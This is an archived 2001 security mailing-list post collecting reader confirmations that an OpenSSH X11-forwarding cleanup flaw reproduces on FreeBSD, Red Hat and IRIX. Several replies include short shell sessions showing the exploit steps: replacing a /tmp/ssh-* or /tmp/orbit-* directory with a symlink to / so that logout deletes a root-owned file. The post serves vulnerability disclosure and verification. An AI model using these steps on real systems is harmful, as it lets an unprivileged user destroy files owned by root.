OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: aleph1securityfocus.com
Date: Tue Jun 05 2001 - 12:30:37 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Tomas Ericsson <tematematik.su.se>

    The vulnerability works perfectly for me: sshd version OpenSSH_2.3.0 greenFreeBSD.org 20010321

    # uname -a
    FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001
    rootjkh101.osd.bsdi.com:/usr/src/sys/compile/GENERIC alpha

    [rootmyhost root]# echo "testing">/cookies
    [rootmyhost root]# ls -l /cookies
    -rw-r--r-- 1 root wheel 8 Jun 5 01:48 /cookies
    [rootmyhost root]# ssh -l te myhost
    [temyhost te]# rm -rf /tmp/ssh-1i24iea5
    [temyhost te]# ln -s / /tmp/ssh-1i24iea5
    [temyhost te]# logout
    [rootmyhost root]# ls -l /cookies
    ls: /cookies: No such file or directory

    Shannon Lee <shannonscatter.com>

    reproduced with OpenSSH_2.3.0p1 on redhat 6.2.

    TE <telinux.nu>

    This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest
    updated packages from RedHat installed.

    RH71# uname -a
    Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
    RH71# rpm -qa|grep openssh-server
    openssh-server-2.5.2p2-5

    RH70# uname -a
    Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
    RH70# rpm -qa|grep openssh-server
    openssh-server-2.5.2p2-1.7.2

    "David Thiel" <dthielnexprise.com>

    I tested this on 4.3-RELEASE, and was successful.
    SSH Version OpenSSH_2.3.0 greenFreeBSD.org 20010321

    KF <dotslashsnosoft.com>

    Works on my box

    [rootbounce dotslash]# cat /etc/redhat-release
    Red Hat Linux release 7.0 (Guinness)
    rootbounce dotslash]# ssh -V
    SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0.
    Compiled with SSL (0x0090581f).

    Jan-Frode Myklebust <janfrodeparallab.uib.no>

    I just tested with OpenSSH_2.5.2p2 on RedHat 7.0,
    and OpenSSH_2.9p1 on IRIX 6.5 and both are
    vulnerable to this. I used protocol version 2 on
    both machines.

    Luciano Miguel Ferreira Rocha <strangensk.yi.org>

    Confirmied on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have
    X forwarding activated.

    "Golden_Eternity" <bhodibigfoot.com>

    I tried to reproduce this on a system running ssh 2.4.0, but I was unable to
    locate the /tmp/ssh-* directory.

    What version of ssh were you using when you discovered this?

    [testshiva test]$ ssh testlocalhost
    warning: Need basic cursor movement capablity, using vt100
    test's password:
    Authentication successful.
    Last login: Mon Jun 04 2001 10:42:08 -0700
    No mail.
    [testshiva test]$ ls -l /tmp/
    total 12
    drwxr-xr-x 2 root root 12288 Apr 8 11:59 lost+found
    [testshiva test]$

    "Schlosser, Matt D." <mschlossereschelon.com

    On the contrary, it just takes another form:

    [rootbob /root]# touch /cookies;ls /cookies
    /cookies
    [rootbob /root]# ssh zenlocalhost
    zenlocalhost's password:
    [zenbob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen
    [zenbob zen]$ logout
    Connection to localhost closed.
    [rootbob /root]# ls /cookies
    /bin/ls: /cookies: No such file or directory 

    -- 
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum